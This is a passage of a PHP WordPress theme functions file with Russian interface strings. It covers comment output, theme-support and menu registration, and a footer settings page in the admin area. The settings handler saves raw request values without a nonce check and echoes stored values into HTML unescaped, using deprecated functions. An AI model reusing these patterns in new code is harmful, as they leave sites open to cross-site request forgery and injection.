		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' - настройки сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
